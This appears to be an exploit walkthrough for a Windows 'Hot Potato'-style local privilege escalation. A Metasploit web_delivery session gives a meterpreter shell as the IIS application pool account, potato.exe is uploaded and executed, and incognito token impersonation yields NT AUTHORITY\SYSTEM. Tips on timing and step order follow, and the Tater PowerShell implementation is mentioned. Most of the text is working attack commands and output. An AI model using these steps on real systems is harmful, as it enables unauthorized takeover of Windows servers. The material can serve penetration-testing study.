Vulnerability reference:
Local Privilege Escalation from Windows Service Accounts to SYSTEM
msf exploit(web_delivery) > set ExitOnsession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
SeAssignPrimaryTokenPrivilege
meterpreter > upload /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- It is important to impersonate the token (or run list_tokens -u) quickly after runnning the binary.
- It is also important to follow the order of the steps.
- Make sure you "use incognito" before running the binary.
a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit
- The Tater was from @Kevin-Robertson
